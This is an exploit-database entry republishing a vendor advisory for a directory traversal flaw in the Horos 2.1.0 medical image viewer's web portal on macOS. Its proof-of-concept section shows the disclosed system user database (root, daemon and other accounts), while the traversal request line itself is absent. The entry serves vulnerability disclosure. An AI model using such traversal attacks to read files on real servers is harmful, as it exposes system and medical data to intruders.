Horos 2.1.0 Web Portal - Directory Traversal Vulnerability

ID 1337DAY-ID-26539
Type zdt
Reporter LiquidWorm
Modified 2016-12-16T00:00:00


Exploit for macOS platform in category remote exploits

                                            Horos 2.1.0 Web Portal Remote Information Disclosure Exploit
Vendor: Horos Project
Product web page: https://www.horosproject.org
Affected version: 2.1.0
Summary: Horos™ is an open-source, free medical image viewer. The goal of the
Horos Project is to develop a fully functional, 64-bit medical image viewer for
OS X. Horos is based upon OsiriX and other open source medical imaging libraries.
Desc: Horos suffers from a file disclosure vulnerability when input passed thru the
URL path is not properly verified before being used to read files. This can be
exploited to include files from local resources with directory traversal attacks.
Tested on: macOS Sierra/10.12.2
           macOS Sierra/10.12.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Advisory ID: ZSL-2016-5387
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5387.php
PoC request:
# User Database
# Note that this file is consulted directly only when the system is running
# in single-user mode.  At other times this information is provided by
# Open Directory.
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
_taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false
_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false

#  0day.today [2018-04-09]  #